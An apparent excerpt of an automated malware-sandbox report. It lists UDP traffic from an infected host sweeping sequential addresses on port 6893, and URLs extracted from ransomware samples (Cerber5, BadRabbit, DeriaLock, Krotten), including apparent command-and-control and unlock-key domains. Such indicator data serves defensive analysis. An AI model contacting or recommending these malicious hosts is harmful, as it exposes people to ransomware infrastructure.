Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.182:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.183:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.184:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.186:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.185:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.187:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.188:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.189:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.190:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.191:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.192:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.193:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.194:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.195:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.196:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.197:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.198:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.199:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.200:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.201:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.202:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.203:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.204:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.205:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.206:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.207:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.208:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.209:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.210:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.211:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.212:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.213:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.214:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.215:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.216:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.218:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.219:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.217:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.220:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.221:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.222:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.223:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.224:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.225:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.226:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.227:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.228:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.229:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.230:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.231:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.232:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.233:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.234:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.235:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.236:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.237:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.238:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.239:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.240:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.241:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.242:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.243:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.244:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.245:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.247:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.248:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.246:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.249:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.250:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.251:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.252:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.253:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.254:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.255:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.0:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.1:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.2:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.3:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.4:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.5:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.6:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.7:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.8:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.9:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.10:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.11:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.12:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.13:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.14:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.15:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.16:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.17:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.19:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.20:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.21:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.22:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.18:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.23:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.24:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.25:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.26:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.27:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.28:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.29:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.30:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.31:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.32:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.33:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.34:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.36:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.35:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.37:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.38:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.39:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.40:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.43:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.53:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.42:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.52:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.41:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.44:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.50:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.47:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.49:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.46:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.48:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.45:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.51:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.55:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.54:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.56:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.57:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.58:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.59:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.60:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.61:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.62:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.63:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.64:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.65:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.66:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.68:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.69:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.70:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.67:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.71:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.72:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.73:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.74:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.75:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.76:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.77:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.78:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.79:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.80:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.81:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.82:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.83:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.84:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.85:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.86:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.87:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.88:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.89:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.90:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.91:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.92:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.93:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.94:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.95:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.96:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.97:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.98:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.99:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.100:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.101:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.102:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.103:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.104:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.105:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.106:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.107:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.108:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.109:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.110:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.111:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.112:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.113:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.114:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.115:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.116:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.117:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.118:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.119:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.120:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.121:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.122:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.123:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.124:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.125:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.126:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.127:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.128:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.129:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.130:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.131:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.132:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.133:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.134:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.135:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.136:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.137:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.138:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.139:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.140:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.141:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.142:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.143:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.144:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.145:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.146:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.147:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.148:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.149:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.150:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.151:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.152:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.153:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.154:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.155:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.156:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.157:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.158:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.160:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.159:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.161:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.162:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.163:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.164:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.165:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.166:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.167:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.168:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.169:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.170:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.171:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.172:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.173:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.174:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.175:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.176:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.177:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.177.178:6893

Source: rundll32.exe, 00000003.00000003.307238763.00000000041F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/
Source: rundll32.exe, 00000003.00000002.333362990.0000000000504000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/5
Source: rundll32.exe, 00000003.00000002.333362990.0000000000504000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/;
Source: rundll32.exe, 00000003.00000003.307613012.0000000000505000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/c
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.blo
Source: Endermanch@DeriaLock.exe, 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr	String found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/
Source: Endermanch@DeriaLock.exe, 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr	String found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/LOGON.exe
Source: Endermanch@DeriaLock.exe, 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr	String found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txt
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://btc.blo
Source: Endermanch@Cerber5.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Endermanch@Cerber5.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: rundll32.exe, 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, dispci.exe.3.dr, cscc.dat.3.dr	String found in binary or memory: http://diskcryptor.net/
Source: Endermanch@Cerber5.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: Endermanch@Krotten.exe.0.dr	String found in binary or memory: http://poetry.rotten.com/lightning/
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://rb.symcb.com/rb.crl0W
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://rb.symcb.com/rb.crt0
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://rb.symcd.com0&
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://s.symcd.com0
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://sf.symcb.com/sf.crl0W
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://sf.symcd.com0&
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr, cscc.dat.3.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Endermanch@DeriaLock.exe, 0000002C.00000000.315117321.0000000000D82000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr	String found in binary or memory: http://wallup.net
Source: Endermanch@DeriaLock.exe, 0000002C.00000000.315117321.0000000000D82000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr	String found in binary or memory: http://wallup.nethttp://wallup.nethttp://wallup.net
Source: svchost.exe, 00000036.00000002.404447518.0000028260013000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xpcx6erilkjced3j.17gcun.top/12F2-EF4B-B826-0098-BE1F
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xpcx6erilkjced3j.18ey8e.top/12F2-EF4B-B826-0098-BE1F
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xpcx6erilkjced3j.19kdeh.top/12F2-EF4B-B826-0098-BE1F
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xpcx6erilkjced3j.1mpsnr.top/12F2-EF4B-B826-0098-BE1F
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xpcx6erilkjced3j.1n5mod.top/12F2-EF4B-B826-0098-BE1F
